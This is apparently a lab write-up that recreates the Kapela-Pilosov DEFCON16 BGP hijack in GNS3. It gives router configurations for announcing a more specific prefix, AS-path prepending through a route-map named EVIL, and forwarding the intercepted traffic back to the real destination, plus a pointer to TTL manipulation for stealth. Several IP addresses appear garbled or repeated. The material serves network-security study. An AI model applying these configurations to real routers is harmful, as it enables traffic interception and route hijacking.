Back in 2008 at DEFCON16, Tony Kapela and Alex Pilosov presented an interesting BGP attack : an internet scale man in the middle.
BGP security is interesting and there are numerous techniques, technologies and protocols to make internet routing more secure. However the problem depicted here remains unsolved. IETF is working on a solution called BGPsec to protect the path (the propagation of the route). Anyway BGPsec is in its early days, let’s focus on the attack.
In this lab I will use the following GNS3 topology. Configuration files will be available at the end of this post.
The attack is not revolutionary in itself and is based on well-known techniques
– Fake announce (static route to null interface + network statement)
– Fake origin / reply path (AS preprending feature)
The goal of this attack is not a denial of service but a man in the middle. It is far more stealth as the traffic still reaches its legitimate destination. It is more difficult to detect, only the AS path through which the packets will go change.
Recall that BGP
– will always prefer the most specific prefixes whatever the AS Path is,
– does not validate route origin (and even if it does with RPKI/ROA, it would be fooled with AS preprend)
The goal of the attack is
– place ourselves between the target AS and one or more ASes to sniff the traffic
– keep a return path to go back to the target AS. Every ASes on the path must be left unmodified.
The attack consists in announcing a more specific prefix than the one advertised by the target AS to the internet, so the internet will go through the attacker AS to reach the legitimate AS.
Then you will need to keep a path to talk with the legitimate AS, and redirect the traffic to it. Finally you can modify the TTL to be definitely stealthier.
STEP 1 – Fake announcements
Creation of the null route and installation in BGP
ip route 18.104.22.168 255.255.255.248 Null0 router bgp 666 no synchronization bgp log-neighbor-changes network 22.214.171.124 mask 255.255.255.248
STEP 2 – Redirection
Identify your reply path to the target
R1#sh ip bgp ... * 126.96.36.199/24 188.8.131.52 0 7 6 1 i *> 184.108.40.206 0 2 1 i * 220.127.116.11 0 3 4 1 i
Fake the origin and make the routers on the return path deny the prefix (because there will be their ASN in the AS Path, and AS Path is a loop prevention mechanism)
ip access-list standard EVIL permit 18.104.22.168 0.0.0.7 route-map EVIL permit 10 match ip address EVIL set as-path prepend 2 1 route-map EVIL permit 100 router bgp 666 neighbor 22.214.171.124 route-map EVIL out neighbor 126.96.36.199 route-map EVIL out neighbor 188.8.131.52 route-map EVIL out
So we can check on R2 (not on the reply path)
R2#sh ip bgp Network Next Hop Metric LocPrf Weight Path ... *> 184.108.40.206/29 220.127.116.11 0 0 666 2 1 i
And R9 on the reply path
R9#sh ip route | i 4.4.4 B 18.104.22.168 [20/0] via 22.214.171.124, 00:23:39
Everything is good up to this point.
Now we need to redirect the traffic towards the real path in order to make it reach its legitimate destination (while we keep looking at it).
To do so, install a static route with the first router of the reply path as next hop (on R1).
ip route 126.96.36.199 255.255.255.255 188.8.131.52
STEP 3 – Verification
We can check on R8
R8#traceroute 184.108.40.206 so lo 0 Type escape sequence to abort. Tracing the route to 220.127.116.11 1 18.104.22.168 16 msec 16 msec 20 msec 2 22.214.171.124 20 msec 32 msec 24 msec ==> R1 - AS666 3 126.96.36.199 36 msec 36 msec 40 msec 4 188.8.131.52 72 msec * 76 msec
STEP 4 – TTL
The TTL modification is handled by a Linux box inside the AS. It is done using iptables TTL manipulations features (man iptables).
DEFCON16 Kapela-Pilosov video: http://www.youtube.com/watch?v=S0BM6aB90n8
DEFCON16 Kapela-Pilosov slides: http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-pilosov-kapela.pdf